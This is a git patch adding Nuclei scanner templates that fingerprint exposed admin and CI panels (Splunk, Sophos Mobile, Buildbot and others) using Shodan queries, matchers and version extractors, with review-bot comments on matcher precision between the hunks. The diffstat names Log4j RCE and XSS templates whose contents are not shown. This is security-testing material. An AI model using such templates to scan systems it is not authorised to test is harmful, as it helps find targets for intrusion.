From aa47b1d97b2cbc8a46d304aeeb2c38c86a7a1953 Mon Sep 17 00:00:00 2001 
From: Adam Crosser <45573557+AdamCrosser@users.noreply.github.com> Date: Wed, 16 Mar 2022 08:17:58 -0500 Subject: [PATCH] Added 23 Nuclei Templates (#3909) * Added 23 Nuclei Templates * Update cofense-vision-detection.yml * Update sophos-mobile-panel-detection.yml * Update cofense-vision-detection.yml * Update httpbin-open-redirect.yml * Update httpbin-xss.yml * Update ansible-semaphore-panel.yml * Rename ansible-semaphore-panel.yml to ansible-semaphore-panel.yaml * Update and rename avatier_password_management.yml to avatier-password-management.yaml * Update and rename buddy-panel.yml to buddy-panel.yaml * Update and rename buildbot-panel.yml to buildbot-panel.yaml * Update and rename cofense-vision-detection.yml to cofense-vision-panel.yaml * Update and rename concourse-ci-panel.yml to concourse-ci-panel.yaml * Update and rename drone-ci-panel.yml to drone-ci-panel.yaml * Update and rename flowci-detection.yml to flowci-panel.yaml * Update and rename gradle-enterprise-build-cache-detect.yml to gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-cache-node-detect.yaml to exposed-panels/gradle/gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-enterprise-panel.yml to exposed-panels/gradle/gradle-enterprise-panel.yaml * Update and rename httpbin-detection.yml to httpbin-panel.yaml * Update and rename leostream-detection.yml to leostream-panel.yaml * Delete redash-detection.yml * Update and rename sophos-mobile-panel-detection.yml to sophos-mobile-panel.yaml * Update and rename splunk-enterprise-login-panel.yml to splunk-enterprise-panel.yaml * Update splunk-enterprise-panel.yaml * Update and rename stridercd-detection.yml to stridercd-panel.yaml * Update and rename zuul-panel.yml to zuul-panel.yaml * Update and rename zentral-detection.yml to zentral-panel.yaml * Update and rename api-fastly.yml to api-fastly.yaml * Update and rename api-gitlab.yml to api-gitlab.yaml * Update and rename httpbin-xss.yml to httpbin-xss.yaml * 
Update and rename httpbin-open-redirect.yml to httpbin-open-redirect.yaml * Update and rename log4j-code42-rce.yml to code42-log4j-rce.yaml * minor matcher fixes * added missing hostname variable * meta data update Co-authored-by: Prince Chaddha Co-authored-by: sandeep --- exposed-panels/ansible-semaphore-panel.yaml | 27 ++++++++++++++ .../avatier-password-management.yaml | 23 ++++++++++++ exposed-panels/buddy-panel.yaml | 30 ++++++++++++++++ exposed-panels/buildbot-panel.yaml | 28 +++++++++++++++ exposed-panels/cofense-vision-panel.yaml | 27 ++++++++++++++ exposed-panels/concourse-ci-panel.yaml | 24 +++++++++++++ exposed-panels/drone-ci-panel.yaml | 27 ++++++++++++++ exposed-panels/flowci-panel.yaml | 25 +++++++++++++ .../gradle/gradle-cache-node-detect.yaml | 25 +++++++++++++ .../gradle/gradle-enterprise-panel.yaml | 21 +++++++++++ exposed-panels/httpbin-panel.yaml | 25 +++++++++++++ exposed-panels/leostream-panel.yaml | 24 +++++++++++++ exposed-panels/sophos-mobile-panel.yaml | 20 +++++++++++ exposed-panels/splunk-enterprise-panel.yaml | 35 +++++++++++++++++++ exposed-panels/stridercd-panel.yaml | 24 +++++++++++++ exposed-panels/zentral-panel.yaml | 22 ++++++++++++ exposed-panels/zuul-panel.yaml | 33 +++++++++++++++++ token-spray/api-fastly.yaml | 24 +++++++++++++ token-spray/api-gitlab.yaml | 24 +++++++++++++ vulnerabilities/code42/code42-log4j-rce.yaml | 35 +++++++++++++++++++ .../httpbin/httpbin-open-redirect.yaml | 27 ++++++++++++++ vulnerabilities/httpbin/httpbin-xss.yaml | 33 +++++++++++++++++ 22 files changed, 583 insertions(+) create mode 100644 exposed-panels/ansible-semaphore-panel.yaml create mode 100644 exposed-panels/avatier-password-management.yaml create mode 100644 exposed-panels/buddy-panel.yaml create mode 100644 exposed-panels/buildbot-panel.yaml create mode 100644 exposed-panels/cofense-vision-panel.yaml create mode 100644 exposed-panels/concourse-ci-panel.yaml create mode 100644 exposed-panels/drone-ci-panel.yaml create mode 100644 
exposed-panels/flowci-panel.yaml create mode 100644 exposed-panels/gradle/gradle-cache-node-detect.yaml create mode 100644 exposed-panels/gradle/gradle-enterprise-panel.yaml create mode 100644 exposed-panels/httpbin-panel.yaml create mode 100644 exposed-panels/leostream-panel.yaml create mode 100644 exposed-panels/sophos-mobile-panel.yaml create mode 100644 exposed-panels/splunk-enterprise-panel.yaml create mode 100644 exposed-panels/stridercd-panel.yaml create mode 100644 exposed-panels/zentral-panel.yaml create mode 100644 exposed-panels/zuul-panel.yaml create mode 100644 token-spray/api-fastly.yaml create mode 100644 token-spray/api-gitlab.yaml create mode 100644 vulnerabilities/code42/code42-log4j-rce.yaml create mode 100644 vulnerabilities/httpbin/httpbin-open-redirect.yaml create mode 100644 vulnerabilities/httpbin/httpbin-xss.yaml diff --git a/exposed-panels/ansible-semaphore-panel.yaml b/exposed-panels/ansible-semaphore-panel.yaml new file mode 100644 index 0000000000..bb97ffa9b6 --- /dev/null +++ b/exposed-panels/ansible-semaphore-panel.yaml @@ -0,0 +1,27 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel Detect + author: Yuzhe-zhang-0 + severity: info + reference: + - https://ansible-semaphore.com/ + - https://github.com/ansible-semaphore/semaphore + metadata: + shodan-query: http.html:"Semaphore" + tags: panel,ansible,semaphore,cicd,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/auth/login' + + matchers-condition: or + matchers: + - type: word + words: + - 'Ansible Semaphore' + + - type: regex + regex: + - 'Semaphore' diff --git a/exposed-panels/avatier-password-management.yaml b/exposed-panels/avatier-password-management.yaml new file mode 100644 index 0000000000..253126f16b --- /dev/null +++ b/exposed-panels/avatier-password-management.yaml 
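Review bot: Under `matchers-condition: or`, the regex matcher `'Semaphore'` already matches every body that the word matcher `'Ansible Semaphore'` matches, so the word matcher is redundant and the template effectively fires on any page at `/auth/login` that mentions Semaphore, including unrelated products that share the name. Switching to `matchers-condition: and`, keeping the `'Ansible Semaphore'` word matcher and adding a `type: status` matcher for 200 would narrow the detection to the intended panel, in line with the sibling templates in this commit.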
@@ -0,0 +1,23 @@ +id: avatier-password-management + +info: + name: Avatier Password Management Panel Detect + author: praetorian-thendrickson + severity: info + reference: https://www.avatier.com + metadata: + shodan-query: http.favicon.hash:983734701 + tags: panel,avatier + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + matchers-condition: and + matchers: + - type: word + words: + - 'LabelWelcomeToPS' + - 'Avatier Corporation' + condition: and diff --git a/exposed-panels/buddy-panel.yaml b/exposed-panels/buddy-panel.yaml new file mode 100644 index 0000000000..b227e65241 --- /dev/null +++ b/exposed-panels/buddy-panel.yaml @@ -0,0 +1,30 @@ +id: buddy-panel + +info: + name: Buddy Panel Detect + author: thardt-praetorian + severity: info + reference: https://buddy.works + metadata: + shodan-query: http.favicon.hash:-850502287 + tags: panel,buddy,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Buddy App' + condition: or + + - type: status + status: + - 200 diff --git a/exposed-panels/buildbot-panel.yaml b/exposed-panels/buildbot-panel.yaml new file mode 100644 index 0000000000..c7713e24e5 --- /dev/null +++ b/exposed-panels/buildbot-panel.yaml @@ -0,0 +1,28 @@ +id: buildbot-panel + +info: + name: Buildbot Panel Detect + author: thardt-praetorian + severity: info + reference: https://buildbot.net + metadata: + shodan-query: http.title:"BuildBot" + tags: panel,buildbot,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'Buildbot' + + - type: status + status: + - 200 diff --git a/exposed-panels/cofense-vision-panel.yaml b/exposed-panels/cofense-vision-panel.yaml new file mode 100644 index 0000000000..50b5326d47 --- /dev/null +++ b/exposed-panels/cofense-vision-panel.yaml 
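Review bot: The first entry in the word matcher's `words` list is an empty string `''`, which every response body contains, so with `condition: or` the matcher always succeeds and the template fires on any page that returns 200. If the committed file actually holds an HTML fragment there (a title tag, say) that this rendering stripped, the file is fine; otherwise drop the empty entry so that only `'Buddy App'` remains, or replace it with a token specific to Buddy's login page.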
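Review bot: The matcher on the `regex:` line is the literal string `'Buildbot'` with no regex metacharacters, so `type: word` would express the same check more cheaply and read more clearly. The single-word match is also generic: any page that mentions Buildbot passes together with the status-200 check, so consider pairing it with a second Buildbot-specific token under `condition: and`, as the Avatier and Cofense templates in this commit do.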
@@ -0,0 +1,27 @@ +id: cofense-vision-panel + +info: + name: Cofense Vision Panel Detect + author: Adam Crosser + severity: info + reference: https://cofense.com + metadata: + shodan-query: http.favicon.hash:739801466 + tags: panel,cofense,vision + +requests: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Vision" + - "Cofense Inc." + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/concourse-ci-panel.yaml b/exposed-panels/concourse-ci-panel.yaml new file mode 100644 index 0000000000..273493c803 --- /dev/null +++ b/exposed-panels/concourse-ci-panel.yaml @@ -0,0 +1,24 @@ +id: concourse-ci-panel + +info: + name: Concourse CI Panel Detect + author: praetorian-thendrickson + severity: info + reference: + - https://github.com/concourse/concourse + - https://concourse-ci.org + metadata: + shodan-query: title:"Concourse" + tags: panel,concourse,oss + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'Concourse' + - 'login to Concourse' + condition: or diff --git a/exposed-panels/drone-ci-panel.yaml b/exposed-panels/drone-ci-panel.yaml new file mode 100644 index 0000000000..5c45f9429b --- /dev/null +++ b/exposed-panels/drone-ci-panel.yaml @@ -0,0 +1,27 @@ +id: drone-ci-panel + +info: + name: Drone CI Panel Detect + author: Yuzhe-zhang-0 + severity: info + reference: https://www.drone.io + metadata: + shodan-query: http.favicon.hash:1354079303 + tags: panel,droneci,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}/welcome' + + matchers-condition: and + matchers: + - type: word + words: + - 'Drone CI' + - 'Drone | Continuous Integration' + condition: or + + - type: status + status: + - 200 diff --git a/exposed-panels/flowci-panel.yaml b/exposed-panels/flowci-panel.yaml new file mode 100644 index 0000000000..35baec0f8f --- /dev/null +++ b/exposed-panels/flowci-panel.yaml 
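Review bot: The word matcher's second entry `'login to Concourse'` can never add a match that `'Concourse'` does not already produce, so under `condition: or` it is dead weight and the template effectively fires on any body containing the word Concourse. There is also no `matchers-condition` or status matcher here, unlike the sibling templates, so error pages that echo the product name count as detections. Tightening to `condition: and` on both words (or keeping `'login to Concourse'` alone) and adding a `type: status` matcher for 200 would follow the stricter pattern used in the Drone CI template.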
@@ -0,0 +1,25 @@ +id: flowci-panel + +info: + name: FlowCI Panel Detect + author: Adam Crosser + severity: info + reference: + - https://github.com/FlowCI/flow-web-x + - https://flowci.github.io/#/ + tags: panel,flowci + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'flow-web-x' + + - type: status + status: + - 200 diff --git a/exposed-panels/gradle/gradle-cache-node-detect.yaml b/exposed-panels/gradle/gradle-cache-node-detect.yaml new file mode 100644 index 0000000000..4a92dd9961 --- /dev/null +++ b/exposed-panels/gradle/gradle-cache-node-detect.yaml @@ -0,0 +1,25 @@ +id: gradle-cache-node-detect + +info: + name: Gradle Enterprise Build Cache Node Detect + author: Adam Crosser + severity: info + reference: https://gradle.com + tags: panel,gradle,cache + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: regex + regex: + - "Gradle Enterprise Build Cache Node (.*)" + + extractors: + - type: regex + part: body + group: 1 + regex: + - "Gradle Enterprise Build Cache Node (.*)" diff --git a/exposed-panels/gradle/gradle-enterprise-panel.yaml b/exposed-panels/gradle/gradle-enterprise-panel.yaml new file mode 100644 index 0000000000..716a32d537 --- /dev/null +++ b/exposed-panels/gradle/gradle-enterprise-panel.yaml @@ -0,0 +1,21 @@ +id: gradle-enterprise-panel + +info: + name: Gradle Enterprise Panel Detect + author: Adam Crosser + severity: info + tags: panel,gradle + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Gradle Enterprise" diff --git a/exposed-panels/httpbin-panel.yaml b/exposed-panels/httpbin-panel.yaml new file mode 100644 index 0000000000..2118039848 --- /dev/null +++ b/exposed-panels/httpbin-panel.yaml 
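Review bot: The `(.*)` group in both regexes is greedy and unanchored, so the extractor's `group: 1` captures everything after the product name to the end of the line rather than a single token; if the trailing text is a version string (the name suggests it, but the hunk does not show it), a bounded group such as `([0-9.]+)` would be more precise. The matcher duplicates the extractor pattern; a `type: word` match on `"Gradle Enterprise Build Cache Node"` would carry the same detection without the capture group.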
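Review bot: `matchers-condition: and` is set but the matchers list holds a single word matcher, so the condition has no effect; either drop it or add a `type: status` matcher for 200 so that a redirect chain ending in an error page that mentions the product does not count as a detection. This is also the only template visible here with no `reference` entry under `info`; a link to the vendor's product page would document what the match is meant to identify.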
@@ -0,0 +1,25 @@ +id: httpbin-panel + +info: + name: HTTPBin Panel Detect + author: Adam Crosser + severity: info + reference: https://github.com/postmanlabs/httpbin + metadata: + shodan-query: http.title:"httpbin.org" + tags: panel,httpbin,oss + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'httpbin.org' + + - type: status + status: + - 200 diff --git a/exposed-panels/leostream-panel.yaml b/exposed-panels/leostream-panel.yaml new file mode 100644 index 0000000000..12169c7e42 --- /dev/null +++ b/exposed-panels/leostream-panel.yaml @@ -0,0 +1,24 @@ +id: leostream-panel +info: + name: Leostream Panel Detect + author: praetorian-thendrickson + severity: info + reference: https://leostream.com + metadata: + shodan-query: http.title:"Leostream" + tags: panel,leostream + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Leostream' + + - type: status + status: + - 200 diff --git a/exposed-panels/sophos-mobile-panel.yaml b/exposed-panels/sophos-mobile-panel.yaml new file mode 100644 index 0000000000..889f6e7a16 --- /dev/null +++ b/exposed-panels/sophos-mobile-panel.yaml @@ -0,0 +1,20 @@ +id: sophos-mobile-panel + +info: + name: Sophos Mobile Panel Detect + author: Adam Crosser + severity: info + reference: https://www.sophos.com/en-us/products/mobile-control + metadata: + shodan-query: http.title:"Sophos Mobile" + tags: panel,sophos + +requests: + - method: GET + path: + - '{{BaseURL}}/login.xhtml?faces-redirect=true' + + matchers: + - type: word + words: + - "Sophos Mobile" diff --git a/exposed-panels/splunk-enterprise-panel.yaml b/exposed-panels/splunk-enterprise-panel.yaml new file mode 100644 index 0000000000..c513c12c53 --- /dev/null +++ b/exposed-panels/splunk-enterprise-panel.yaml 
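Review bot: The template has one word matcher on `"Sophos Mobile"` and no status matcher, so an error or redirect page that merely names the product passes as a detection. Adding `matchers-condition: and` with a `type: status` matcher for 200, as the Leostream and HTTPBin templates in this commit do, would keep the detection tied to the actual login page requested at `/login.xhtml?faces-redirect=true`.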
@@ -0,0 +1,35 @@ +id: splunk-enterprise-panel + +info: + name: Splunk Enterprise Panel Detect + author: praetorian-thendrickson + severity: info + reference: https://www.splunk.com/en_us/software/splunk-enterprise.html + metadata: + shodan-query: http.title:"Login - Splunk" + tags: panel,splunk + +requests: + - method: GET + path: + - '{{BaseURL}}/en-US/account/login' + + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - 'Splunk Inc.' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version": "(.*)"' + - 'versionNumber": "([0-9.]+)"' + - '"VERSION_LABEL": "([0-9.]+)"' diff --git a/exposed-panels/stridercd-panel.yaml b/exposed-panels/stridercd-panel.yaml new file mode 100644 index 0000000000..f6181ff662 --- /dev/null +++ b/exposed-panels/stridercd-panel.yaml @@ -0,0 +1,24 @@ +id: stridercd-panel + +info: + name: StriderCD Panel + author: Adam Crosser + severity: info + reference: + - https://github.com/Strider-CD/strider + - https://strider-cd.github.io + metadata: + shodan-query: http.favicon.hash:115295460 + tags: panel,cicd,oss,stridercd,strider + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "Strider: Brilliant Continuous Deployment" diff --git a/exposed-panels/zentral-panel.yaml b/exposed-panels/zentral-panel.yaml new file mode 100644 index 0000000000..62e05ae148 --- /dev/null +++ b/exposed-panels/zentral-panel.yaml @@ -0,0 +1,22 @@ +id: zentral-panel + +info: + name: Zentral pANEL Detect + author: Adam Crosser + severity: info + reference: + - https://github.com/zentralopensource/zentral + - https://zentral.io + tags: panel,zentral,oss + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'Zentral' + - '
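Review bot: The first extractor regex `'"version": "(.*)"'` uses a greedy unbounded group while the two below it use `([0-9.]+)`, so on a line holding other quoted values after `version` it captures past the version number up to the last double quote. Aligning it to `'"version": "([0-9.]+)"'` keeps all three extractors returning a bare version token. `redirects: true` without `max-redirects` also differs from the other templates in this set, which cap redirect following at 2; setting the same cap here would be consistent.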
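Review bot: The `name` field reads `StriderCD Panel` while every other exposed-panels template in this commit ends in `Detect`; renaming it to `StriderCD Panel Detect` keeps the naming convention that downstream listings rely on. The single word matcher is specific enough, but there is no status matcher, so consider the same `matchers-condition: and` plus status-200 pairing used by the Splunk template above.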